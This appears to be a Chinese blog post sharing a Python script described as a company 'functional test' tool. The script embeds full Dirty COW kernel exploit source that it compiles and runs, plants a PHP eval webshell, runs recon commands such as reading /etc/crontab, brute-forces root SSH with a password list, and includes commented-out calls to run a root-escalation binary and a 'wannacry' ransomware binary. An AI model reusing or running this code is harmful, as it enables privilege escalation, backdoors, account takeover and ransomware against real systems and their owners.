某一功能测试脚本
帮公司测试写的一个功能测试脚本。需要尽量少用第三方库,但其实还是用到了,连接ssh必须需要用到。
# coding:utf-8 import socket import sys import os import paramiko import subprocess from subprocess import Popen,PIPE print "\033[0;31m " print ''' ●●●█〓█████████▅▄▄▄▄▄▄▄▃▃▃▃▄ ●● ▄██ 〓█★ ★█ 〓 ██▄ [ @Author:2amor ] ▄▅██████████████████████▅▄▃ ███████████████████████████◤ ◥⊙▲⊙▲⊙▲⊙▲⊙▲⊙▲⊙▲⊙▲⊙▲⊙▲⊙ ''' print "\033[0m" # 漏洞利用验证代码 poc_code = """ /* * main.c * * Created on: Oct 21, 2016 * Author: 5t4rk */ #include<stdio.h> #include<sys/mman.h> #include<fcntl.h> #include<pthread.h> #include<string.h> void *map; int f; struct stat st; char* name; void * madviseThread(void *arg) { char *str; str = (char *) arg; int i, c = 0; for (i = 0; i < 100000000; i++) { c += madvise(map, 100, MADV_DONTNEED); } printf("madvise %d\\n", c); } void * procselfmemThread(void *arg) { char *str; str = (char *) arg; int f = open("/proc/self/mem", O_RDWR); int i, c = 0; for (i = 0; i < 100000000; i++) { lseek(f, map, SEEK_SET); c += write(f, str, strlen(str)); } printf("procselfmem %d\\n", c); } int main(int argc, char *argv[]) { if (argc < 3) return 1; pthread_t pth1, pth2; f = open(argv[1], O_RDONLY); fstat(f, &st); name = argv[1]; map = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, f, 0); printf("mmap %x\\n", map); pthread_create(&pth1, NULL, madviseThread, argv[1]); pthread_create(&pth2, NULL, procselfmemThread, argv[2]); pthread_join(pth1, NULL); pthread_join(pth2, NULL); return 0; } """ #临时文件内容 test_content = "noo" def write_poc(code,file): with open(file,'w') as f: f.write(code) # 编译poc def mc_gcc(file): pobj = Popen('gcc '+file+" -lpthread -o mc_poc", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True) result = pobj.communicate() return result # 判断是否存在漏洞 def mc_vuln(file): pobj = Popen('cat '+file, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True) result = pobj.communicate() return result[0] # 执行poc def mc_binx(file): pobj = Popen('./'+file+" mc_tmp yes|ps -ef|grep '[m]c_poc mc_tmp'|awk '{print $2}'|xargs kill -9", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True) result = pobj.communicate() return result # 扫描渗透溯源的端口 def scan_port(host): ports = [21, 22, 23, 53, 139, 445, 1433, 3306, 3389, 8123] target_ip = socket.gethostbyname(host) for port in ports: print "port scanning is %s " % port sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(2) result = sock.connect_ex((target_ip, int(port))) if result == 0: print("open_port:" + str(port)) # 执行系统命令 def exec_system(): print(os.system('whoami')) print(os.system('uname -a')) print(os.system('cat /proc/version')) print(os.system('cat /etc/crontab')) print(os.system('netstat -ntlp')) print(os.system('id')) print(os.system('ps -ef')) # 生成脚本木马 def echo_webshell(path): path = path + 'webshell.php' if os.path.exists(path): os.remove(path) with open(path, 'w') as f: f.writelines("<?php @eval($_POST['cmd']);?>") if os.path.exists(path): print('生成脚本木马文件成功!') # 远程连接ssh def ssh_connect(host): ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) password = ['toor', 'admin123', 'root123'] for pwd in password: try: print(host, pwd) ssh.connect(hostname=host, port=22, username='root', password=pwd, timeout=5) ssh.close() print('破解成功!用户名:root' + '密码:' + pwd + ',ip:' + host) except paramiko.AuthenticationException, e: pass print("failed to connect ssh") # 使用dirtycow提权 def get_root(path): path = path + 'cowroot5' os.system("sudo chmod +x %s" % path) os.system("%s" % path) # 执行wannacry勒索脚本 def exec_wannacry(path): path = path + 'wannacry' os.system("chmod +x %s" % path) os.system("%s" % path) if __name__ == '__main__': if len(sys.argv) < 2: print('argument error') print("pip install -r requirements.txt") print('example:python checklist.py -h 127.0.0.1 -p /tmp/') exit(0) host = sys.argv[2] path = sys.argv[4] scan_port(host) echo_webshell(path) exec_system() write_poc(poc_code, 'mc_poc.c') write_poc(test_content, 'mc_tmp') mc_gcc('mc_poc.c') mc_binx('mc_poc') # print type(mc_vuln('mc_tmp')) if mc_vuln('mc_tmp') == 'yes': print 'The os is vulnerability!Please upgrade the kernel.' elif mc_vuln('mc_tmp') == 'noo': print 'You are Lucky dog~ No vuln.' #ssh_connect(host) # get_root(path) # exec_wannacry(path)
参考文献:
http://pirogue.org/2017/09/12/dirtycow/